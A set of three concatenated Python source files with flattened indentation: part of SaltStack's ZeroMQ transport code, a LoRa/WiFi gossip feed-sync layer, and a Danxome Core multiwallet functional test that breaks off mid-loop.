self._socket.setsockopt(zmq.IDENTITY, self.opts['id'])
# TODO: cleanup all the socket opts stuff
if hasattr(zmq, 'TCP_KEEPALIVE'):
self._socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max']
)
log.debug("Generated random reconnect delay between '{0}ms' and '{1}ms' ({2})".format(
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay)
)
log.debug("Setting zmq_reconnect_ivl to '{0}ms'".format(recon_delay))
self._socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug("Setting zmq_reconnect_ivl_max to '{0}ms'".format(
self.opts['recon_default'] + self.opts['recon_max'])
)
self._socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self._socket.setsockopt(zmq.IPV4ONLY, 0)
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
self._monitor = ZeroMQSocketMonitor(self._socket)
self._monitor.start_io_loop(self.io_loop)
def destroy(self):
if hasattr(self, '_monitor') and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, '_stream'):
# TODO: Optionally call stream.close() on newer pyzmq? Its broken on some
self._stream.io_loop.remove_handler(self._stream.socket)
self._stream.socket.close(0)
if hasattr(self, 'context'):
self.context.term()
def __del__(self):
self.destroy()
# TODO: this is the time to see if we are connected, maybe use the req channel to guess?
@tornado.gen.coroutine
def connect(self):
if not self.auth.authenticated:
yield self.auth.authenticate()
self.publish_port = self.auth.creds['publish_port']
self._socket.connect(self.master_pub)
@property
def master_pub(self):
'''
Return the master publish port
'''
return 'tcp://{ip}:{port}'.format(ip=self.opts['master_ip'],
port=self.publish_port)
@tornado.gen.coroutine
def _decode_messages(self, messages):
'''
Take the zmq messages, decrypt/decode them into a payload
:param list messages: A list of messages to be decoded
'''
messages_len = len(messages)
# if it was one message, then its old style
if messages_len == 1:
payload = self.serial.loads(messages[0])
# 2 includes a header which says who should do it
elif messages_len == 2:
payload = self.serial.loads(messages[1])
else:
raise Exception(('Invalid number of messages ({0}) in zeromq pub'
'message from master').format(len(messages_len)))
# Yield control back to the caller. When the payload has been decoded, assign
# the decoded payload to 'ret' and resume operation
ret = yield self._decode_payload(payload)
raise tornado.gen.Return(ret)
@property
def stream(self):
'''
Return the current zmqstream, creating one if necessary
'''
if not hasattr(self, '_stream'):
self._stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
return self._stream
def on_recv(self, callback):
'''
Register a callback for recieved messages (that we didn't initiate)
:param func callback: A function which should be called when data is received
'''
if callback is None:
return self.stream.on_recv(None)
@tornado.gen.coroutine
def wrap_callback(messages):
payload = yield self._decode_messages(messages)
callback(payload)
return self.stream.on_recv(wrap_callback)
class ZeroMQReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel):
def zmq_device(self):
'''
Multiprocessing target for the zmq queue device
'''
salt.utils.appendproctitle('MWorkerQueue')
self.context = zmq.Context(self.opts['worker_threads'])
# Prepare the zeromq sockets
self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.clients.setsockopt(zmq.IPV4ONLY, 0)
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
# Socket monitor shall be used the only for debug purposes so using threading doesn't look too bad here
import threading
self._monitor = ZeroMQSocketMonitor(self.clients)
t = threading.Thread(target=self._monitor.start_poll)
t.start()
self.workers = self.context.socket(zmq.DEALER)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Setting up the master communication server')
self.clients.bind(self.uri)
self.workers.bind(self.w_uri)
while True:
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
def close(self):
'''
Cleanly shutdown the router socket
'''
if hasattr(self, '_monitor') and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, 'clients'):
self.clients.close()
self.stream.close()
def pre_fork(self, process_manager):
'''
Pre-fork we need to create the zmq router device
:param func process_manager: An instance of salt.utils.process.ProcessManager
'''
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
process_manager.add_process(self.zmq_device)
def post_fork(self, payload_handler, io_loop):
'''
After forking we need to create all of the local sockets to listen to the
router
:param func payload_handler: A function to called to handle incoming payloads as
they are picked up off the wire
:param IOLoop io_loop: An instance of a Tornado IOLoop, to handle event scheduling
'''
self.payload_handler = payload_handler
self.io_loop = io_loop
self.context = zmq.Context(1)
self._socket = self.context.socket(zmq.REP)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Worker binding to socket {0}'.format(self.w_uri))
self._socket.connect(self.w_uri)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
self.stream.on_recv_stream(self.handle_message)
@tornado.gen.coroutine
def handle_message(self, stream, payload):
'''
Handle incoming messages from underylying TCP streams
:stream ZMQStream stream: A ZeroMQ stream.
See http://zeromq.github.io/pyzmq/api/generated/zmq.eventloop.zmqstream.html
:param dict payload: A payload to process
'''
try:
payload = self.serial.loads(payload[0])
payload = self._decode_payload(payload)
except Exception as e:
log.error('Bad load from minion')
stream.send(self.serial.dumps('bad load'))
raise tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
log.error('payload and load must be a dict. Payload was: {0} and load was {1}'.format(payload, payload.get('load')))
stream.send(self.serial.dumps('payload and load must be a dict'))
raise tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
stream.send(self.serial.dumps(self._auth(payload['load'])))
raise tornado.gen.Return()
# TODO: test
try:
# Take the payload_handler function that was registered when we created the channel
# and call it, returning control to the caller until it completes
ret, req_opts = yield self.payload_handler(payload)
except Exception as e:
# always attempt to return an error to the minion
stream.send('Some exception handling minion payload')
log.error('Some exception handling a payload from minion', exc_info=True)
raise tornado.gen.Return()
req_fun = req_opts.get('fun', 'send')
if req_fun == 'send_clear':
stream.send(self.serial.dumps(ret))
elif req_fun == 'send':
stream.send(self.serial.dumps(self.crypticle.dumps(ret)))
elif req_fun == 'send_private':
stream.send(self.serial.dumps(self._encrypt_private(ret,
req_opts['key'],
req_opts['tgt'],
)))
else:
log.error('Unknown req_fun {0}'.format(req_fun))
# always attempt to return an error to the minion
stream.send('Server-side exception handling payload')
raise tornado.gen.Return()
class ZeroMQPubServerChannel(salt.transport.server.PubServerChannel):
'''
Encapsulate synchronous operations for a publisher channel
'''
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
def connect(self):
return tornado.gen.sleep(5)
def _publish_daemon(self):
'''
Bind to the interface specified in the configuration file
'''
salt.utils.appendproctitle(self.__class__.__name__)
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
# if 2.1 >= zmq < 3.0, we only have one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, self.opts.get('pub_hwm', 1000))
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
# Set the High Water Marks. For more information on HWM, see:
# http://api.zeromq.org/4-1:zmq-setsockopt
pub_sock.setsockopt(zmq.SNDHWM, self.opts.get('pub_hwm', 1000))
pub_sock.setsockopt(zmq.RCVHWM, self.opts.get('pub_hwm', 1000))
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
pub_sock.setsockopt(zmq.IPV4ONLY, 0)
pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
salt.utils.zeromq.check_ipc_path_max_len(pull_uri)
# Start the minion command publisher
log.info('Starting the Salt Publisher on {0}'.format(pub_uri))
pub_sock.bind(pub_uri)
# Securely create socket
log.info('Starting the Salt Puller on {0}'.format(pull_uri))
old_umask = os.umask(0o177)
try:
pull_sock.bind(pull_uri)
finally:
os.umask(old_umask)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
package = pull_sock.recv()
unpacked_package = salt.payload.unpackage(package)
payload = unpacked_package['payload']
if self.opts['zmq_filtering']:
# if you have a specific topic list, use that
if 'topic_lst' in unpacked_package:
for topic in unpacked_package['topic_lst']:
# zmq filters are substring match, hash the topic
# to avoid collisions
htopic = hashlib.sha1(topic).hexdigest()
pub_sock.send(htopic, flags=zmq.SNDMORE)
pub_sock.send(payload)
# otherwise its a broadcast
else:
# TODO: constants file for "broadcast"
pub_sock.send('broadcast', flags=zmq.SNDMORE)
pub_sock.send(payload)
else:
pub_sock.send(payload)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except KeyboardInterrupt:
# Cleanly close the sockets if we're shutting down
if pub_sock.closed is False:
pub_sock.setsockopt(zmq.LINGER, 1)
pub_sock.close()
if pull_sock.closed is False:
pull_sock.setsockopt(zmq.LINGER, 1)
pull_sock.close()
if context.closed is False:
context.term()
def pre_fork(self, process_manager):
'''
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
:param func process_manager: A ProcessManager, from salt.utils.process.ProcessManager
'''
process_manager.add_process(self._publish_daemon)
def publish(self, load):
'''
Publish "load" to minions
:param dict load: A load to be sent across the wire to minions
'''
payload = {'enc': 'aes'}
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
payload['load'] = crypticle.dumps(load)
if self.opts['sign_pub_messages']:
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
log.debug("Signing data packet")
payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
# Send 0MQ to the publisher
context = zmq.Context(1)
pub_sock = context.socket(zmq.PUSH)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
pub_sock.connect(pull_uri)
int_payload = {'payload': self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load['tgt_type'] == 'list':
int_payload['topic_lst'] = load['tgt']
pub_sock.send(self.serial.dumps(int_payload))
# TODO: unit tests!
class AsyncReqMessageClient(object):
'''
This class wraps the underylying zeromq REQ socket and gives a future-based
interface to sending and recieving messages. This works around the primary
limitation of serialized send/recv on the underlying socket by queueing the
message sends in this class. In the future if we decide to attempt to multiplex
we can manage a pool of REQ/REP sockets-- but for now we'll just do them in serial
'''
def __init__(self, opts, addr, linger=0, io_loop=None):
'''
Create an asynchronous message client
:param dict opts: The salt opts dictionary
:param str addr: The interface IP address to bind to
:param int linger: The number of seconds to linger on a ZMQ socket. See
http://api.zeromq.org/2-1:zmq-setsockopt [ZMQ_LINGER]
:param IOLoop io_loop: A Tornado IOLoop event scheduler [tornado.ioloop.IOLoop]
'''
self.opts = opts
self.addr = addr
self.linger = linger
if io_loop is None:
zmq.eventloop.ioloop.install()
tornado.ioloop.IOLoop.current()
else:
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
# wire up sockets
self._init_socket()
self.send_queue = []
# mapping of message -> future
self.send_future_map = {}
self.send_timeout_map = {} # message -> timeout
# TODO: timeout all in-flight sessions, or error
def destroy(self):
if hasattr(self, 'stream') and self.stream is not None:
# TODO: Optionally call stream.close() on newer pyzmq? It is broken on some.
if self.stream.socket:
self.stream.socket.close()
self.stream.io_loop.remove_handler(self.stream.socket)
# set this to None, more hacks for messed up pyzmq
self.stream.socket = None
self.socket.close()
self.context.term()
def __del__(self):
self.destroy()
def _init_socket(self):
if hasattr(self, 'stream'):
self.stream.close() # pylint: disable=E0203
self.socket.close() # pylint: disable=E0203
del self.stream
del self.socket
self.socket = self.context.socket(zmq.REQ)
# socket options
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, 5000
)
self._set_tcp_keepalive()
if self.addr.startswith('tcp://['):
# Hint PF type if bracket enclosed IPv6 address
if hasattr(zmq, 'IPV6'):
self.socket.setsockopt(zmq.IPV6, 1)
elif hasattr(zmq, 'IPV4ONLY'):
self.socket.setsockopt(zmq.IPV4ONLY, 0)
self.socket.linger = self.linger
self.socket.connect(self.addr)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self.socket, io_loop=self.io_loop)
def _set_tcp_keepalive(self):
'''
Ensure that TCP keepalives are set for the ReqServer.
Warning: Failure to set TCP keepalives can result in frequent or unexpected
disconnects!
'''
if hasattr(zmq, 'TCP_KEEPALIVE') and self.opts:
if 'tcp_keepalive' in self.opts:
self.socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
if 'tcp_keepalive_idle' in self.opts:
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
if 'tcp_keepalive_cnt' in self.opts:
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
if 'tcp_keepalive_intvl' in self.opts:
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
@tornado.gen.coroutine
def _internal_send_recv(self):
while len(self.send_queue) > 0:
message = self.send_queue.pop(0)
future = self.send_future_map.pop(message)
# send
def mark_future(msg):
if not future.done():
future.set_result(self.serial.loads(msg[0]))
self.stream.on_recv(mark_future)
self.stream.send(message)
try:
ret = yield future
except: # pylint: disable=W0702
self._init_socket() # re-init the zmq socket (no other way in zmq)
continue
self.remove_message_timeout(message)
def remove_message_timeout(self, message):
if message not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message)
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message):
'''
Handle a message timeout by removing it from the sending queue
and informing the caller
:raises: SaltReqTimeoutError
'''
del self.send_timeout_map[message]
self.send_future_map.pop(message).set_exception(SaltReqTimeoutError('Message timed out'))
def send(self, message, timeout=None, callback=None):
'''
Return a future which will be completed when the message has a response
'''
message = self.serial.dumps(message)
future = tornado.concurrent.Future()
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message] = future
if timeout is not None:
send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message)
self.send_timeout_map[message] = send_timeout
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._internal_send_recv)
self.send_queue.append(message)
return future
class ZeroMQSocketMonitor(object):
__EVENT_MAP = None
def __init__(self, socket):
'''
Create ZMQ monitor sockets
More information:
http://api.zeromq.org/4-0:zmq-socket-monitor
'''
self._socket = socket
self._monitor_socket = self._socket.get_monitor_socket()
self._monitor_stream = None
def start_io_loop(self, io_loop):
log.trace("Event monitor start!")
self._monitor_stream = zmq.eventloop.zmqstream.ZMQStream(self._monitor_socket, io_loop=io_loop)
self._monitor_stream.on_recv(self.monitor_callback)
def start_poll(self):
log.trace("Event monitor start!")
while self._monitor_socket is not None and self._monitor_socket.poll():
msg = self._monitor_socket.recv_multipart()
self.monitor_callback(msg)
@property
def event_map(self):
if ZeroMQSocketMonitor.__EVENT_MAP is None:
event_map = {}
for name in dir(zmq):
if name.startswith('EVENT_'):
value = getattr(zmq, name)
event_map[value] = name
ZeroMQSocketMonitor.__EVENT_MAP = event_map
return ZeroMQSocketMonitor.__EVENT_MAP
def monitor_callback(self, msg):
evt = zmq.utils.monitor.parse_monitor_message(msg)
evt['description'] = self.event_map[evt['event']]
log.debug("ZeroMQ event: {0}".format(evt))
if evt['event'] == zmq.EVENT_MONITOR_STOPPED:
self.stop()
def stop(self):
if self._socket is None:
return
self._socket.disable_monitor()
self._socket = None
self._monitor_socket = None
if self._monitor_stream is not None:
self._monitor_stream.close()
self._monitor_stream = None
log.trace("Event monitor done!")
|
lora_sync_layer.py
|
from wifi_link_layer import Wifi_Link_Layer
from lora_feed_layer import Lora_Feed_Layer
import os
import math
import time
import _thread
import threading
import json
import crypto
import feed
import binascii
import event
import pcap
import sys
from struct import unpack
class Lora_Sync_Layer:
def __init__(self, feed_layer):
self.link_layer = Wifi_Link_Layer(self.receive_msg_cb)
self.feed_layer = feed_layer
#self.events_list = [[0, "Hallo1"], [1, "Hallo2"], [2, "Hallo3"], [3, "Hallo4"]]
#_thread.start_new_thread(self.send_gossip, ())
self.verbose = 1 # write a lot of comments
self.gossip_wait = 8
a = threading.Thread(target=self.send_gossip)
a.start()
def receive_msg_cb(self, msg):
self.decode_msg(msg)
def decode_msg(self, msg):
control_int = msg[0] * 1
fid = msg[1:9]
#msg = str(msg, "utf-8")
if (control_int == 0):
print("Sync Layer | New gossip received")
feed_len_int = msg[9] * 256 + msg[10]
self.handle_incoming_gossip(feed_len_int,fid)
elif (control_int == 1):
print("Sync Layer | New event received")
feed_len_int = msg[9] * 256 + msg[10]
data = msg[11:len(msg)]
self.handle_incoming_event(feed_len_int,data,fid)
def handle_incoming_gossip(self, msg,fid):
print("Sync Layer | Handle incoming gossip")
if (msg < self.feed_layer.get_feed_length(fid)):
print("Sync Layer | Sending event nr " + str(msg))
search = msg + 1
e_wired = self.feed_layer.get_wired_event(fid, search)
print("Sync Layer | Sending event: Length=" + str(len(e_wired)))
control_b = (1).to_bytes(1, 'big')
feed_len_b = search.to_bytes(2, 'big')
#wait random time before sending
random = int.from_bytes(os.urandom(1), "big")
gossip_waiting = self.gossip_wait + math.floor(random/256*5)
if self.verbose:
print('send_gossip waiting for '+ str(gossip_waiting))
time.sleep(gossip_waiting)
self.send_event(control_b + fid + feed_len_b + e_wired)
def handle_incoming_event(self, seq,msg,fid):
print("Sync Layer | Event data: " + str(msg))
#if (incoming_event[0] == len(self.events_list)): #check if already appended
#self.events_list.append(incoming_event)
#print("Acquired event:" + str(incoming_event[0]))
#fid = self.feed_layer.get_sensor_feed_fid()
self.feed_layer.append(fid,seq, msg)
print("Sync Layer | Feed length:" + str(self.feed_layer.get_feed_length(fid)))
#if data is needed automatically append data.
#else if it could be used later, store to a buffer.
#check if data usefull and append to feeds or append to buffer if event in between is missing
def send_event(self, msg):
self.link_layer.append_msg_to_pipeline(msg, False)
#events einzeln senden? Wie gross können einzelne Nachrichten sein?
def send_gossip(self):
while True:
# get current feeds
[pcap_list,fid_list] = self.feed_layer.get_fid_list()
random = int.from_bytes(os.urandom(1), "big")
gossip_waiting = self.gossip_wait + math.floor(random/256*5)
for fi in fid_list:
if self.verbose:
print('send_gossip waiting for '+ str(gossip_waiting))
time.sleep(gossip_waiting)
control_b = (0).to_bytes(1, 'big')
feed_len = self.feed_layer.get_feed_length(fi)
feed_len_b = feed_len.to_bytes(2, 'big')
gossip = control_b + fi + feed_len_b
if self.verbose:
[name,type] = self.feed_layer.get_name(fi)
print("Sync Layer | Send gossip: 0 " + name + " " + str(feed_len))
# control_b = (0).to_bytes(1, 'big')
# fid = self.feed_layer.get_sensor_feed_fid()
# feed_len = self.feed_layer.get_feed_length(fid)
# feed_len_b = feed_len.to_bytes(2, 'big')
#
# gossip = control_b + feed_len_b
#
# #a = str(gossip[0], 'big')
# #b = str(gossip[1:2], 'big')
# feed_len_int = feed_len_b[0] * 256 + feed_len_b[1]
# control_int = control_b[0] * 1
#print("Sync Layer | Feed lenght: " + str(len(self.feed)))
#msg = "gssp-bc//" + str(feed_len)
#print(msg)
self.link_layer.append_msg_to_pipeline(gossip, False)
|
wallet_multiwallet.py
|
#!/usr/bin/env python3
# Copyright (c) 2017-2021 The Danxome Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a danxomed node can load multiple wallet files
"""
from decimal import Decimal
from threading import Thread
import os
import shutil
import stat
import time
from test_framework.authproxy import JSONRPCException
from test_framework.blocktools import COINBASE_MATURITY
from test_framework.test_framework import DanxomeTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
get_rpc_proxy,
)
got_loading_error = False
def test_load_unload(node, name):
global got_loading_error
while True:
if got_loading_error:
return
try:
node.loadwallet(name)
node.unloadwallet(name)
except JSONRPCException as e:
if e.error['code'] == -4 and 'Wallet already loading' in e.error['message']:
got_loading_error = True
return
class MultiWalletTest(DanxomeTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.rpc_timeout = 120
self.extra_args = [["-nowallet"], []]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument(
'--data_wallets_dir',
default=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/wallets/'),
help='Test data with wallet directories (default: %(default)s)',
)
def run_test(self):
node = self.nodes[0]
data_dir = lambda *p: os.path.join(node.datadir, self.chain, *p)
wallet_dir = lambda *p: data_dir('wallets', *p)
wallet = lambda name: node.get_wallet_rpc(name)
def wallet_file(name):
if name == self.default_wallet_name:
return wallet_dir(self.default_wallet_name, self.wallet_data_filename)
if os.path.isdir(wallet_dir(name)):
return wallet_dir(name, "wallet.dat")
return wallet_dir(name)
assert_equal(self.nodes[0].listwalletdir(), {'wallets': [{'name': self.default_wallet_name}]})
# check wallet.dat is created
self.stop_nodes()
assert_equal(os.path.isfile(wallet_dir(self.default_wallet_name, self.wallet_data_filename)), True)
# create symlink to verify wallet directory path can be referenced
# through symlink
os.mkdir(wallet_dir('w7'))
os.symlink('w7', wallet_dir('w7_symlink'))
os.symlink('..', wallet_dir('recursive_dir_symlink'))
os.mkdir(wallet_dir('self_walletdat_symlink'))
os.symlink('wallet.dat', wallet_dir('self_walletdat_symlink/wallet.dat'))
# rename wallet.dat to make sure plain wallet file paths (as opposed to
# directory paths) can be loaded
# create another dummy wallet for use in testing backups later
self.start_node(0)
node.createwallet("empty")
node.createwallet("plain")
node.createwallet("created")
self.stop_nodes()
empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
os.rename(wallet_file("empty"), empty_wallet)
shutil.rmtree(wallet_dir("empty"))
empty_created_wallet = os.path.join(self.options.tmpdir, 'empty.created.dat')
os.rename(wallet_dir("created", self.wallet_data_filename), empty_created_wallet)
shutil.rmtree(wallet_dir("created"))
os.rename(wallet_file("plain"), wallet_dir("w8"))
shutil.rmtree(wallet_dir("plain"))
# restart node with a mix of wallet names:
# w1, w2, w3 - to verify new wallets created when non-existing paths specified
# w - to verify wallet name matching works when one wallet path is prefix of another
# sub/w5 - to verify relative wallet path is created correctly
# extern/w6 - to verify absolute wallet path is created correctly
# w7_symlink - to verify symlinked wallet path is initialized correctly
# w8 - to verify existing wallet file is loaded correctly. Not tested for SQLite wallets as this is a deprecated BDB behavior.
# '' - to verify default wallet file is created correctly
to_create = ['w1', 'w2', 'w3', 'w', 'sub/w5', 'w7_symlink']
in_wallet_dir = [w.replace('/', os.path.sep) for w in to_create] # Wallets in the wallet dir
in_wallet_dir.append('w7') # w7 is not loaded or created, but will be listed by listwalletdir because w7_symlink
to_create.append(os.path.join(self.options.tmpdir, 'extern/w6')) # External, not in the wallet dir, so we need to avoid adding it to in_wallet_dir
to_load = [self.default_wallet_name]
if not self.options.descriptors:
to_load.append('w8')
wallet_names = to_create + to_load # Wallet names loaded in the wallet
in_wallet_dir += to_load # The loaded wallets are also in the wallet dir
self.start_node(0)
for wallet_name in to_create:
self.nodes[0].createwallet(wallet_name)
for wallet_name in to_load:
self.nodes[0].loadwallet(wallet_name)
os.mkdir(wallet_dir('no_access'))
os.chmod(wallet_dir('no_access'), 0)
try:
with self.nodes[0].assert_debug_log(expected_msgs=['Error scanning']):
walletlist = self.nodes[0].listwalletdir()['wallets']
finally:
# Need to ensure access is restored for cleanup
os.chmod(wallet_dir('no_access'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
assert_equal(sorted(map(lambda w: w['name'], walletlist)), sorted(in_wallet_dir))
assert_equal(set(node.listwallets()), set(wallet_names))
# should raise rpc error if wallet path can't be created
err_code = -4 if self.options.descriptors else -1
assert_raises_rpc_error(err_code, "boost::filesystem::create_director", self.nodes[0].createwallet, "w8/bad")
# check that all requested wallets were created
self.stop_node(0)
for wallet_name in wallet_names:
assert_equal(os.path.isfile(wallet_file(wallet_name)), True)
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())
self.start_node(0, ['-wallet=w1', '-wallet=w1'])
self.stop_node(0, 'Warning: Ignoring duplicate -wallet w1.')
if not self.options.descriptors:
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# should not initialize if one wallet is a copy of another
shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
in_wallet_dir.append('w8_copy')
exp_stderr = r"BerkeleyDatabase: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
# should not initialize if wallet file is a symlink
os.symlink('w8', wallet_dir('w8_symlink'))
self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)
# should not initialize if the specified walletdir does not exist
self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
# should not initialize if the specified walletdir is not a directory
not_a_dir = wallet_dir('notadir')
open(not_a_dir, 'a', encoding="utf8").close()
self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')
self.log.info("Do not allow -upgradewallet with multiwallet")
self.nodes[0].assert_start_raises_init_error(['-upgradewallet'], "Error: Error parsing command line arguments: Invalid parameter -upgradewallet")
# if wallets/ doesn't exist, datadir should be the default wallet dir
wallet_dir2 = data_dir('walletdir')
os.rename(wallet_dir(), wallet_dir2)
self.start_node(0)
self.nodes[0].createwallet("w4")
self.nodes[0].createwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
self.generatetoaddress(node, nblocks=1, address=w5.getnewaddress(), sync_fun=self.no_op)
# now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
os.rename(wallet_dir2, wallet_dir())
self.restart_node(0, ['-nowallet', '-walletdir=' + data_dir()])
self.nodes[0].loadwallet("w4")
self.nodes[0].loadwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
w5_info = w5.getwalletinfo()
assert_equal(w5_info['immature_balance'], 50)
competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
os.mkdir(competing_wallet_dir)
self.restart_node(0, ['-nowallet', '-walletdir=' + competing_wallet_dir])
self.nodes[0].createwallet(self.default_wallet_name)
if self.options.descriptors:
exp_stderr = f"Error: SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another instance of {self.config['environment']['PACKAGE_NAME']}?"
else:
exp_stderr = r"Error: Error initializing wallet database environment \"\S+competing_walletdir\S*\"!"
self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
self.restart_node(0)
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
wallets = [wallet(w) for w in wallet_names]
wallet_bad = wallet("bad")
# check wallet names and balances
self.generatetoaddress(node, nblocks=1, address=wallets[0].getnewaddress(), sync_fun=self.no_op)
for wallet_name, wallet in zip(wallet_names, wallets):
info = wallet.getwalletinfo()
